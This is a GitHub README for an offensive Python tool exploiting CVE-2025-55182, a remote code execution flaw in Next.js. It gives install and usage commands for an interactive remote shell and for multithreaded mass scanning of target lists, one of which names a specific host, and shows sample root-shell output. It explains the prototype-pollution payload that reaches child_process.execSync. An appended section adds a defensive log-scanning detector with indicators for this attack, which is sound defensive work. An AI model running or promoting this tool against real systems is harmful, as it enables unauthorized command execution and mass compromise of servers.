Jenderal92/CVE-2025-55182-React2shell

GitHub: Jenderal92/CVE-2025-55182-React2shell

Stars: 6 | Forks: 1

# CVE-2025-55182 - React2shell

A Python 2.7 exploit for **CVE-2025-55182** – a critical prototype pollution / RCE vulnerability in Next.js applications. This tool allows both **single‑target interactive shell** and **mass scanning** of multiple hosts with multithreading, colorful output, and automatic HTTPS fallback.

## 🚀 Features

- ✅ **Interactive Shell** for single targets – execute arbitrary system commands
- ✅ **Mass Scan** from a file list – multithreaded, fast, results saved automatically
- ✅ **Auto‑detection** – single URL → shell mode, existing file → mass scan mode
- ✅ **Automatic HTTPS** – adds `https://` if no protocol is given
- ✅ **Thread‑safe file writing** – saves vulnerable results in real‑time
- ✅ **Custom commands** – change the default `id` to any command (`whoami`, `ls`, etc.)
- ✅ **No external dependencies** – only `requests` (easily installable)

## 📋 Requirements

- **Python 2.7** (the tool is specifically written for Python 2.7)
- `requests` library – install with `pip install requests`
- A terminal that supports ANSI colors (most Linux/macOS terminals, Windows Terminal, PowerShell)

## 📦 Installation

```bash
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests
```

Make the script executable (optional):

```bash
chmod +x CVE-2025-55182.py
```

## 🎯 Usage

### 1. Interactive Shell (Single Target)

```bash
python2 CVE-2025-55182.py https://target.com
```

or without protocol (HTTPS is added automatically):

```bash
python2 CVE-2025-55182.py target.com
```

Once connected and verified vulnerable, you get a shell prompt:

```
$ id
uid=0(root) gid=0(root) groups=0(root)
$ whoami
root
$ ls -la
...
```

Built‑in commands:

- `exit` / `quit` – close shell
- `clear` – clear screen
- `help` – show help

### 2. Mass Scan (List of Targets)

Prepare a file with one target per line (with or without http/https):

`targets.txt`:

```
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org
```

```bash
python2 CVE-2025-55182.py targets.txt
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt
```

Mass scan output example:

```
[INFO] Loaded 4 URLs
[INFO] Threads: 10, Command: 'id', Output: res.txt
[*] (1/4) Checking: https://site.com
[+] VULNERABLE: https://site.com
    Status: 303
    Output: uid=0(root) gid=0(root) groups=0(root)
[-] NOT VULNERABLE: https://example.com
...
```

Saved results (`res.txt`):

```
domain : https://site.com
cmd    : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------
```

## 🧪 How It Works

The exploit sends a crafted `multipart/form-data` request to a Next.js endpoint (`/login` is appended if the path is empty). It abuses prototype pollution (`__proto__:then` and `constructor:constructor`) to inject a malicious prefix that executes a system command using `child_process.execSync()`. The server responds with a 303 redirect containing the command output in the `x-action-redirect` header (or `Location`). The tool extracts the result from `/login?a=`.

## 🛡️ Disclaimer

This tool is intended for educational purposes and authorized security testing only. Unauthorized access to computer systems is illegal. The author assumes no liability for any misuse or damage caused by this software. You must have explicit written permission from the owner of the target system before using this exploit.

### More Disclaimer

You can see the full disclaimer on the Jenderal92 profile page: [HERE !!!](https://github.com/Jenderal92/)
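Seen from the defending side, the request/response pattern in "How It Works" gives a log-level detection signature. The following is an added example and not code from this repository: it scans constructed JSON proxy-log records (hypothetical field names and host) for the multipart prototype-pollution keys and for the 303 redirect to `/login?a=` that carries command output, and is written in Python 3 rather than the tool's Python 2.7.

```python
import json
import re

# Indicators from "How It Works": prototype-pollution keys in a multipart body,
# and a 303 whose redirect header points at /login?a= (the tool's output channel).
POLLUTION_KEYS = ("__proto__", "constructor")
REDIRECT_HEADERS = ("x-action-redirect", "location")
EXFIL_PATH = re.compile(r"^/login\?a=", re.IGNORECASE)

def score_record(rec):
    """Reasons one request/response record matches the pattern (empty = clean)."""
    reasons = []
    ctype = rec.get("request_content_type", "").lower()
    body = rec.get("request_body", "")
    if ctype.startswith("multipart/form-data") and any(k in body for k in POLLUTION_KEYS):
        reasons.append("prototype-pollution key in multipart body")
    headers = {k.lower(): v for k, v in rec.get("response_headers", {}).items()}
    if rec.get("response_status") == 303:
        for name in REDIRECT_HEADERS:
            if name in headers and EXFIL_PATH.match(headers[name]):
                reasons.append("303 redirect to /login?a= via %s" % name)
                break
    return reasons

def scan_log(lines):
    """Scan newline-delimited JSON records; return [(url, reasons)] for hits."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        try:
            rec = json.loads(line)
        except ValueError:
            continue  # malformed record: skip it rather than abort the scan
        reasons = score_record(rec)
        if reasons:
            hits.append((rec.get("url", "?"), reasons))
    return hits

# Constructed sample records (hypothetical host; bodies truncated on purpose).
SAMPLE_LOG = [
    '{"url": "https://app.example/login", "request_content_type": "multipart/form-data; boundary=x",'
    ' "request_body": "name=\\"email\\" alice@example", "response_status": 200, "response_headers": {}}',
    '{"url": "https://app.example/login", "request_content_type": "multipart/form-data; boundary=x",'
    ' "request_body": "...__proto__...then...constructor...", "response_status": 303,'
    ' "response_headers": {"X-Action-Redirect": "/login?a=uid=1000(node) gid=1000(node)"}}',
    '{"url": "https://app.example/", "request_content_type": "", "request_body": "",'
    ' "response_status": 303, "response_headers": {"Location": "/dashboard"}}',
    'not json at all',
]
```

In a real deployment, exported WAF or reverse-proxy records would be fed to `scan_log`; a hit on the response side alone is still worth triage, because many proxies do not log request bodies at all.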